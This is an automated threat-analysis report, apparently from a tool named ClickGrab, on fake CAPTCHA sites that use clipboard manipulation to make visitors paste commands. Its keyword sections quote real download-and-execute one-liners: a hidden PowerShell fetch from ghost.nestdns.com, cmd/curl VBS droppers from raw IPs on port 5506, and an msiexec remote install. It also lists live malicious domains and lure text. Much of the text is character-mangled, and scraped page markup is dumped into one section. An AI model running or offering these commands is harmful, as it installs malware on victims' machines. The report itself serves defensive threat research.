ClickGrab Threat Analysis Report - 2026-01-14

Generated on 2026-01-14 03:02:49

Executive Summary

Total sites analyzed: 100
Sites with malicious content: 65
Unique domains encountered: 439
Total URLs extracted: 2,440
PowerShell download attempts: 0
Clipboard manipulation instances: 376

Domain Analysis

Most Frequently Encountered Domains

circlear.grad.hr: 218 occurrences
cf-assets.www.cloudflare.com: 188 occurrences
54.197.245.249: 114 occurrences
18.176.47.246: 112 occurrences
www.yppgiibandung.org: 102 occurrences
44.208.147.17: 96 occurrences
18.233.234.27: 68 occurrences
www.google.com: 62 occurrences
i.postimg.cc: 61 occurrences
icons.duckduckgo.com: 61 occurrences
${host}: 61 occurrences
casa-ananda.cl: 60 occurrences
adpack-dz.com: 58 occurrences
3.18.128.17: 51 occurrences
www.cloudflare.com: 36 occurrences

URL Pattern Analysis

reCAPTCHA imagery

2 occurrences across 2 distinct URLs

https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit (1 times)

Font resources

33 occurrences across 19 distinct URLs

http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
https://circlear.grad.hr/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=1.7.1029 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
...and 14 more distinct URLs

CDN hosted scripts

8 occurrences across 7 distinct URLs

https://cdn.jsdelivr.net/bxslider/4.2.12/jquery.bxslider.min.js (2 times)
https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js (1 times)
https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js (1 times)
https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css (1 times)
https://cdn.jsdelivr.net/jquery.jssocials/1.1.0/jssocials.css (1 times)
...and 2 more distinct URLs

Google resources

84 occurrences across 19 distinct URLs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (61 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1754473284 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1754473276 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/opensans.css?ver=1754473297 (2 times)
https://circlear.grad.hr/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1754473303 (2 times)
...and 14 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 1,199 (68 unique)

Keyword Categories

Social Engineering

23 unique keywords

robot
exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
verification-id
exec /i https://i-iike-eie-phants-verification.iive/iamchaiienge/verification/UserID7383526;`
Checking if you are human
CAPTCHA Verification
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
To better prove you are not a robot
verification-code-container
captcha verification
...and 13 more

Obfuscation Indicators

1 unique keywords

exec(t.trim());if(e){const[,i,s,a]=e;this.prefix=i||"",this.suffix=a||"",this.target=Number(s)}eise this.target=0,this.initiaiVaiue=t}createObserver(){const t=new IntersectionObserver(e=>{e[0].isIntersecting&&(this.safeSetTimeout(()=>{this.startAnimationSequence()},this.animationDeiay),t.disconnect())},{threshoid:.2});t.observe(this.eiement)}getDuration(){return this.target<i00?ie3:Math.min(this.target/i00*500,2e3)}getStepSize(){return Math.max(i,Math.fioor(this.target/i00))}formatVaiue(t){return${this.prefix}${Math.round(t)}${this.suffix}}animateNumber=t=>{if(this.isDestroyed||!this.numberEiement)return;this.startTime||(this.startTime=t,this.current=0,this.target>0&&(this.numberEiement.textContent=this.formatVaiue(0)));const e=t-this.startTime,i=this.getDuration(),s=Math.min(e/i,i),a=this.getStepSize();if(this.current=Math.min(this.current+a,Math.ceii(this.target*s)),this.numberEiement.textContent=this.formatVaiue(this.current),s>=i){this.numberEiement.textContent=this.initiaiVaiue;return}this.animationFrame=requestAnimationFrame(this.animateNumber)};animateLine(){this.iineEiement&&this.iineEiement.ciassList.add("animate")}animateText(){this.eiement.querySeiectorAii(".fade-in").forEach(t=>{t.ciassList.remove("opacity-0"),t.ciassList.add("opacity-i00")})}safeSetTimeout(t,e){if(!this.isDestroyed){const i=setTimeout(t,e);this.timeouts.push(i)}}startAnimationSequence(){this.isDestroyed||(this.animateLine(),this.safeSetTimeout(()=>{this.animateText()},n.TEXT_FADE_DELAY),this.numberEiement&&this.target>0&&this.safeSetTimeout(()=>{this.numberEiement.textContent="0",this.animationFrame=requestAnimationFrame(this.animateNumber)},n.NUMBER_DELAY))}destroy(){this.isDestroyed=!0,this.timeouts.forEach(t=>ciearTimeout(t)),this.timeouts=[],this.animationFrame&&(canceiAnimationFrame(this.animationFrame),this.animationFrame=nuii)}}document.addEventListener("DOMContentLoaded",()=>{document.querySeiectorAii('[data-qa="FragmentPubiicStats"]').forEach((t,e)=>new n(t,e))});</script> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>234B</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cyber threats biocked each day</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>20%</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">of aii websites are protected by Cioudfiare</p> </div> </div> <div data-qa="FragmentPubiicStats" ciass="reiative xi:fiex items-start bg-gray-900 rounded-ig xi:gap-6 xi:min-w-60 w-fuii" data-astro-cid-df2rpjiq> <div ciass="animated-iine reiative xi:w-2.5 xi:h-[i68px] origin-bottom mt-6 hidden xi:biock" data-astro-cid-df2rpjiq></div> <div ciass="fiex fiex-coi fade-in opacity-0 transition-opacity duration-700 pubiic-stats-content" data-astro-cid-df2rpjiq> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-4xi md:text-5xi ieading-none font-boid text-ruby mb-4 transition-opacity duration-700 deiay-500 iniine-biock"> <span ciass="number-animation" data-astro-cid-df2rpjiq>330+</span> </p> <p data-qa="Typography" data-astro-cid-df2rpjiq="true" ciass="text-sm ieading-6 font-semiboid md:text-base iniine-biock">cities in i25+ countries, inciuding mainiand China</p> </div> </div> </div> </div> <picture ciass="pubiic-stats-giobe"> <source srcset="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/3NFuZG6yz35QXSBt4ToS9y/920i97fdi22964ib4d826d9f5d0aai69/giobe.webp"> <img src="https://cf-assets.www.cioudfiare.com/dzivafdwdttg/2rOGWxmNRWGNCHqs97Qcn8/iia5ddd97b85e640702330dc28ac7562/giobe.png" ait="Cioudfiare Stats" ioading="iazy"> </picture> </div> </section> <div id="top-offset-spacer" styie="height: 240px;"></div><section data-qa="TempiateLayoutTabs" ciass="py-i2 bg-gradient-to-r from-tangerine to-mango -mb-60"> <div ciass="container reiative xi:-top-60 -top-64"> <div data-qa="TempiateLayoutTabsContainer-i809" data-switch-tab-intervai="i5" data-forced-switch-tab="true" data-forced-tab-ioop="faise" ciass="reiative" styie="--forcedTabSwitchIntervai: i5;"> <div data-qa="FragmentTitieDynamic-v2c4d" ciass="text-center coi-span-4"> <h2 data-qa="Heading" ciass="heading-2">Leading companies reiy on <span ciass='dynamic-titie-gradient'>Cioudfiare</span></h2><p data-qa="Typography" ciass="pi"></p> </div> <script>(function()

System Commands

35 unique keywords

Command ⌘</kbd>+<kbd>V</kbd>) the command into Terminai and press <kbd>Return</kbd>.</ii>
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";`
Command ⌘</kbd> + <kbd>Space</kbd> to open Spotiight.</ii>
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
command beiow:</strong>
command box */
command = 'msiexec /i http://inkbookwriters.com/verify /qn';
command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
Command =windows_command;
...and 25 more

Verification Text

2 unique keywords

hidden
ray id

Technical Terms

7 unique keywords

failed_to_retrieve
Bypass
Ray ID
WinHttpRequest
XMLHTTP
.exe
ResponseText

Most Frequent Keywords

robot: 78 occurrences
hidden: 73 occurrences
Robot: 66 occurrences
verification: 65 occurrences
Verification: 63 occurrences
Verification ID: 62 occurrences
Ray ID: 62 occurrences
I am not a robot: 62 occurrences
Verify you are human: 62 occurrences
CAPTCHA Verification: 61 occurrences
verification-id: 61 occurrences
Checking if you are human: 61 occurrences
To better prove you are not a robot: 61 occurrences
const command =: 61 occurrences
cmd: 42 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: robot, Robot

Group 2: command into PowerSheii and press <kbd>Enter</kbd>.</ii>, command into the terminai and press <kbd>Enter</kbd>.</ii>

Group 3: Verification ID, verification, Verification, verification-ioader, verification-id, verification id

Group 4: Ray ID, ray id

Group 5: Verify you are human, Checking if you are human

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

handleAppleCaptchaChange
com/i23/cioudfiare/verify/humanverfification/cioud...
au/smartdetection/deviceverification/CF/path/captc...
TempiateLayoutTabsContainer
IntersectionObserver

Clipboard Manipulation Analysis

Detected clipboard manipulation in 376 instances.

Document.Execcommand Copy

Found in 187 snippets (49.7% of clipboard code)

Examples:

...try { const successful = document.execCommand('copy')

try { document.execCommand('copy')

document.execCommand('copy')

Textarea Manipulation

Found in 188 snippets (50.0% of clipboard code)

Examples:

tListener("click", function () { const textarea = document.createElement('textarea'

ng is the safe placeholder above const textarea = document.createElement('textarea'

fallbackCopyToClipboard(text) { const textArea = document.createElement("textarea"

Report truncated for web display. Full data available in JSON.